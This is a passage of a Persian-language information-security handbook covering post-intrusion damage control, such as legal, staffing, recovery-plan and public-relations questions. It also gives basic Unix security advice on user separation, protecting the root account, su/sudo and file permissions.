‫ﺍﺭﺯﻧﺪﻩﺍﻱ ﺑﻪ ﺍﺭﻣﻐﺎﻥ ﺁﻭﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﻌﻀﻲ ﺗﻴﻤﻬـﺎ ﻗـﻮﺍﻧﻴﻨﻲ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﻃﺒـﻖ ﺁﻥ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ ﺻـﺮﺍﺣﺘﹰﺎ ﺍﻃﻼﻋـﺎﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺭﻭﺯ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺴﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﺗﺎ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺮﺑﻮﻃﻪ ﺍﻳﻦ ﻓﺮﺻﺖ ﺭﺍ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﺻﻼﺡ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺁﻧـﺮﺍ ﻣﻨﺘـﺸﺮ‬
‫ﻛﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻧﺘﻮﺍﻧﻴﺪ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻣﻠﻲ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ‪.‬‬

‫ﻛﻨﺘﺮﻝ ﺧﺴﺎﺭﺗﻬﺎ‬
‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺗﺮﻣﻴﻢ ﻛﺮﺩﻩﺍﻳﺪ‪ ،‬ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﭼﻪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺩﻳﮕﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺩﺭﺟـﺔ ﺍﻭﻝ‬
‫ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﺍﻍ ﺗﺄﺛﻴﺮﺍﺕ ﺑﻌﺪﻱ ﻳﻚ ﻧﻔﻮﺫ ﺭﻓﺖ ﻭ ﻫﺮﮔﻮﻧﻪ ﻋﻮﺍﻗﺐ ﺗﺒﻬﻜﺎﺭﺍﻧﺔ ﻧﻔـﻮﺫ ﺭﺍ ﺩﺭ ﻧﻈـﺮ ﮔﺮﻓـﺖ‪ .‬ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﺁﻳـﺎ ﺩﺭ ﺟﺮﻳـﺎﻥ ﻧﻔـﻮﺫ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ؟ ﺍﮔﺮ ﺁﺭﻱ‪ ،‬ﺑﺎﻳﺪ ﺑﺎ ﻣﺸﺎﻭﺭ ﺭﺳﻤﻲ ﺧﻮﺩ ﻣﺸﻮﺭﺕ ﻛﻨﻴﺪ ﻭ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﻳﺪ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺮﺣﻠـﻪ‬
‫ﻣﻲﺧﻮﺍﻫﻴﺪ ﭼﻪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪.‬‬
‫ﺑﺎﻳﺪ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﻛﺪﺍﻡ ﻳﻚ ﺍﺯ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺯﻳﺮ ﺭﺍ ﺑﺎﻳﺪ ﺑﻴﺸﺘﺮ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮﻳﻚ ﻣﻲﺧﻮﺍﻫﻴﺪ ﭼﻪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪:‬‬
‫ﺁﻳﺎ ﻧﻴﺎﺯ ﺑﻪ ﺗﺸﻜﻴﻞ ﻳﻚ ﭘﺮﻭﻧﺪﺓ ﺭﺳﻤﻲ ﺩﺭ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ‪ ،‬ﻳﻚ ﺩﻓﺘﺮ ﺣﻘـﻮﻗﻲ‪ ،‬ﻳـﻚ ﺷـﺮﻛﺖ ﺑﻴﻤـﻪ‪ ،‬ﻳـﺎ ﻧـﺰﺩ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﮔﺎﻥ ﻭ‬ ‫‪.١‬‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺤﺼﻮﻻﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺩ ﺩﺍﺭﻳﺪ؟‬
‫ﺁﻳﺎ ﺑﺎﻳﺪ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻛﺎﺭﻣﻨﺪ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺭﺍ ﺍﺧﺮﺍﺝ ﻛﻨﻴﺪ ﻳﺎ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﻗﻮﺍﻧﻴﻦ ﺍﻧﻀﺒﺎﻃﻲ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ‬ ‫‪.٢‬‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺎﻳﺪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺭﺍ ﺗﺤﺖ ﺁﻣﻮﺯﺵ ﻗﺮﺍﺭ ﺩﻫﻴﺪ؟‬
‫ﺁﻳﺎ ﻧﻴﺎﺯﻣﻨﺪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻃﺮﺡ "ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ" ﺧﻮﺩ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﺍﻳﻦ ﻭﺍﻗﻌﻪ ﻫﺴﺘﻴﺪ؟‬ ‫‪.٣‬‬
‫ﺁﻳﺎ ﻧﻴﺎﺯ ﺑﻪ ﺑﺎﺯﺭﺳﻲ ﻭ ﺍﺻﻼﺡ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺧﻮﺩ ﻳﺎ ﺳﺎﻳﺮ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺍﺑﺴﺘﻪ ﺩﺍﺭﻳﺪ؟‬ ‫‪.٤‬‬
‫ﺁﻳﺎ ﺍﺩﺍﺭﺓ ﺭﻭﺍﺑﻂ ﻋﻤﻮﻣﻲ ﺷﻤﺎ ﺑﺎﻳﺪ ﺩﺭ ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﻳﻚ ﮔﺰﺍﺭﺵ ﺭﺳﻤﻲ )ﺩﺭ ﺩﺍﺧﻞ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ( ﻣﻨﺘﺸﺮ ﻛﻨﺪ؟‬ ‫‪.٥‬‬
‫ﻼ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ‪.‬‬
‫ﭘﺎﺳﺨﻬﺎﻱ ﺷﻤﺎ ﺳﺆﺍﻻﺕ ﺑﺎﻻ ﺑﺴﺘﻪ ﺑﻪ ﻣﻮﻗﻌﻴﺖ ﺳﺎﺯﻣﺎﻥ ﻭ ﺍﻫﻤﻴﺖ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﻣ ﹰ‬
‫‪٤٤١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﺩﻫﻢ‬
‫ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺑﻴﺸﺘﺮ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﻉ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻳﺎ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻓﻨـﻲ ﺧـﺎﺹ ﺑـﺮﺍﻱ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ Unix‬ﻭ ‪ ،Microsoft Windows ،Linux‬ﻭ ‪ MacOS 7-9‬ﻣﻲﭘﺮﺩﺍﺯﻳﻢ‪) .‬ﻣﻄﺎﻟـﺐ ﻣﺮﺑـﻮﻁ ﺑـﻪ ‪ MacOS X‬ﺩﺭ ﻗـﺴﻤﺖ‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ‪ Unix‬ﮔﻨﺠﺎﻧﺪﻩ ﺷﺪﻩﺍﻧﺪ‪(.‬‬

‫‪٣٤٦‬‬
‫‪ Unix‬ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺸﺎﺑﻪ‬
‫ﺩﺭ ﮔﺬﺷﺘﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺑﺰﺭﮒ‪ ،‬ﭼﻨﺪﻛﺎﺭﺑﺮﻩ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ‪ ،‬ﻭ ﻳﺎ ﺩﺭ ‪cluster‬ﻫﺎﻳﻲ ﺍﺯ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ‬
‫ﺑﺎ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺷﺒﻜﻪﺍﻱ ﺁﺭﺍﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﺪﻧﺪ‪ .‬ﺍﻣﺮﻭﺯﻩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﺑﺼﻮﺭﺕ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻳـﺎ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎﻛﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺯﻳﺎﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺸﺎﺑﻪ ‪ Unix‬ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺩ ﺭﻭﻱ‬
‫ﻫﺮ ﻧﺴﺨﺔ ‪ ،Unix‬ﺍﺧﺘﺼﺎﺻﻲ ﺍﺳﺖ ﻭ ﺷﻤﺎ ﺑﺎﻳﺪ ﺗﻮﺿﻴﺤﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺴﺨﺔ ‪ Unix‬ﺧﺎﺻﻲ ﻛﻪ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺷـﻤﺎ ﺍﺳـﺖ ﺭﺍ ﺑﺨﻮﺍﻧﻴـﺪ‪.‬‬
‫ﭼﻨﺪﻳﻦ ﻛﺘﺎﺏ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ‪ ،‬ﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﺧﻮﺏ ﭘﺴﺘﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ‪ Unix‬ﺩﺭ ﺿﻤﻴﻤﺔ ﺩﻭﻡ ﺗﺎ ﭘﻨﺠﻢ ﻛﺘﺎﺏ ﺁﻭﺭﺩﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬

‫ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﮔﺮﻭﻫﻬﺎ‪ ،‬ﻭ ﺍﺑﺮﻛﺎﺭﺑﺮ‬


‫ﺑﺨﺶ ﻋﻤﺪﻩﺍﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ‪ Unix‬ﺑﺮ ﭘﺎﻳﺔ ﺟﺪﺍﺳﺎﺯﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺍﺳﺖ‪ .‬ﺩﺭ ‪ Unix‬ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎ ﻭ ﭘـﺮﺩﺍﺯﻩﻫـﺎ‪،‬‬
‫ﻳﻚ ﺷﻨﺎﺳﺔ ﮔﺮﻭﻩ ﻭ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻣﺆﺛﺮ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﺸﺨﺺﻛﻨﻨﺪﺓ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺍﺳـﺖ‪ .‬ﻫـﻴﭻ ﺩﻭ ﻛـﺎﺭﺑﺮﻱ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻳـﻚ‬
‫ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭﺍﺣﺪ ﻳﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﺸﺘﺮﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﺑﻠﻜﻪ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺑﺎﻳـﺪ ﻣﺠـﺰﺍ ﺑﺎﺷـﻨﺪ ﻭ ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ ﺣﻘـﻮﻕ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺩﺳﺘﺮﺳﻲ ﻓﺎﻳﻠﻬﺎ ﺑﺮﺍﻱ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻜﺴﺎﻥ ﺍﺳﺖ ﺑﺎﻳﺪ ﺍﺯ "ﮔﺮﻭﻫﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ" ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺎﺑﻪ ‪ ،Unix‬ﻛﺎﺭﺑﺮ ‪) root‬ﻛﻪ ‪ UID‬ﺁﻥ ﺑﺮﺍﺑﺮ ﺻﻔﺮ ﻣﻲﺑﺎﺷﺪ( "ﺍﺑﺮﻛﺎﺭﺑﺮ" ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺗﻮﺍﻧـﺎﻳﻲ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮ ﺩﺭ ﻫـﺮ ﺟﻨﺒـﺔ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺍﺭﺩ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﺍﻣﺮ‪ ،‬ﺩﺭ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﻭ ﭘـﺮﺩﺍﺯﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺎ ﺍﻣﺘﻴـﺎﺯﺍﺕ‬
‫‪ root‬ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﺍﺯ ﺍﻫﻤﻴﺖ ﻭﻳﮋﻩﺍﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﺯ ﺑﻜﺎﺭﺑﺮﺩﻥ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﻭ ﻣﻌﻤـﻮﻟﻲ‬
‫ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺍﻣﮑﺎﻥ ﻭﺭﻭﺩ ﺁﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ ﻭ ﻫﻨﮕﺎﻡ ﻧﻴـﺎﺯ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ‪ ،root‬ﺍﺯ ﺩﺳـﺘﻮﺭ ‪) su‬ﻳـﺎ‬
‫ﮔﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺁﻥ ﻣﺜﻞ ‪ (sudo‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺳﻄﺢ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺳﻄﺢ ﻳﮏ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻌﻤﻮﻟﻲ ﺑﻪ ﺳـﻄﺢ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ root‬ﺗﺒﺪﻳﻞ ﮐﻨﻴﺪ‪ .‬ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺛﺒﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻫﻢ ﻣﻬﺎﺟﻢ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﺑـﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ‪ ،‬ﺩﻭ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺗﺴﺨﻴﺮ ﻛﻨﺪ‪ .‬ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭﺍﺗﻲ ﻣﺎﻧﻨﺪ ‪ su‬ﺭﺍ ﻧﻴﺰ ﺑﺎﻳﺪ ﻣﺤـﺪﻭﺩ ﻛﻨﻴـﺪ؛‬ ‫ﮔﺮﻓﺘﻦ ﺩﺳﺘﺮﺳ ﹺ‬
‫ﺩﺭ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﻓﻘﻂ ﻛﺎﺭﺑﺮﺍﻥ ﮔﺮﻭﻩ ‪ wheel‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ‪ su‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬

‫‪ ۳۴۶‬ﺩﺭ ﺳﺮﺗﺎﺳﺮ ﺍﻳﻦ ﻗﺴﻤﺖ ﻋﺒﺎﺭﺗﻬﺎﻱ "‪ "Unix‬ﻭ "ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ "Unix‬ﺑﻪ ﻳﻚ ﻣﻌﻨﻲ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ‪ .‬ﻫﺮﭼﻨﺪ ﻣﻌﻤﻮ ﹰﻻ ﺍﺯ ﻭﺍﮊﺓ ‪ Unix‬ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺍﻳـﻦ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ‪ Linux‬ﻭ ﺳﺎﻳﺮ ﮔﻮﻧﻪﻫﺎﻱ ‪ Unix‬ﻧﻴﺰ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٤٢‬‬

‫ﺑﻌﻀﻲ ﻧﺴﺨﻪﻫﺎﻱ ‪ Unix‬ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺍﺟﺮﺍﻱ ﺳﻴﺴﺘﻢ‪ ،‬ﺍﺧﺘﻴﺎﺭﺍﺕ ﻛﺎﺭﺑﺮ ‪ root‬ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻳﺎ ﺳﻄﻮﺡ ﺍﻣﻨﻴﺘﻲ‬
‫ﻫﺴﺘﻪ ﻣﺤﺪﻭﺩ ﻛﻨﻨﺪ‪ .‬ﻣﺴﺘﻨﺪﺍﺕ ﻣﺤﺼﻮﻝ ﺧﻮﺩ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻭ ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺣﺴﺎﺳﻲ ﺩﺍﺭﻳﺪ ﺑﻬﺘﺮ ﺍﺳﺖ ﺁﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺍﺯ ﺁﻧﻬـﺎ ﺭﻭﻱ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﻗﺎﺑـﻞ ﺣﻤـﻞ ﻧﮕﻬـﺪﺍﺭﻱ ﻛﻨﻴـﺪ ﺗـﺎ ﺩﺭﺻـﻮﺭﺕ‬
‫ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻥ ﺣﺴﺎﺏ ‪ ،root‬ﺍﺯ ﻟﻮ ﺭﻓﺘﻦ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪ .‬ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﻧﺎﻣـﺔ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻧﻴـﺰ ﺭﻭﻱ ﻫﻤـﺎﻥ ﺳﻴـﺴﺘﻢ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻓﺎﻳﻠﻬﺎ ﻓﺎﻳﺪﻩﺍﻱ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﻮﻥ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ‬
‫ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻳﻚ ﻧﺴﺨﺔ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﻩ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻧﻴﺰ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬

‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ‬


‫ﻫﺮ ﻓﺎﻳﻞ ﺩﺭ ‪ Unix‬ﻳﻚ "ﻣﺎﻟﻚ" ﻭ ﻳﻚ "ﮔﺮﻭﻩ" ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﻣﺎﻟﻚ ﻓﺎﻳﻞ‪ ،‬ﺍﻋﻀﺎﻱ ﮔـﺮﻭﻩ ﻓﺎﻳـﻞ ﻭ ﺳـﺎﻳﺮ ﺍﻓـﺮﺍﺩ ﭼـﻪ ﻛﺎﺭﻫـﺎﻳﻲ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻓﺎﻳﻞ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ chmod‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺁﻥ ﻣﺠﻮﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‬
‫ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺧﻮﺍﻧﺪﻥ ﻣﺤﺘﻮﻳﺎﺕ ﻓﺎﻳﻞ‪ ،‬ﻧﻮﺷﺘﻦ ﺩﺭ ﻓﺎﻳﻞ ﻭ ﺍﺟﺮﺍﻱ ﻓﺎﻳﻞ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ‪ .‬ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺷﺎﺧﻪﻫﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ ﭼﻪ ﻛﺴﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺭﻭﻥ ﺷﺎﺧﻪ ﺭﺍ ﺑﺒﻴﻨﺪ ﻭ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﺍﺯ ﺷﺎﺧﻪ ﺣﺬﻑ ﻳـﺎ ﺑـﻪ ﺁﻥ ﺍﺿـﺎﻓﻪ ﻛﻨـﺪ‪ .‬ﻧﺤـﻮﺓ‬
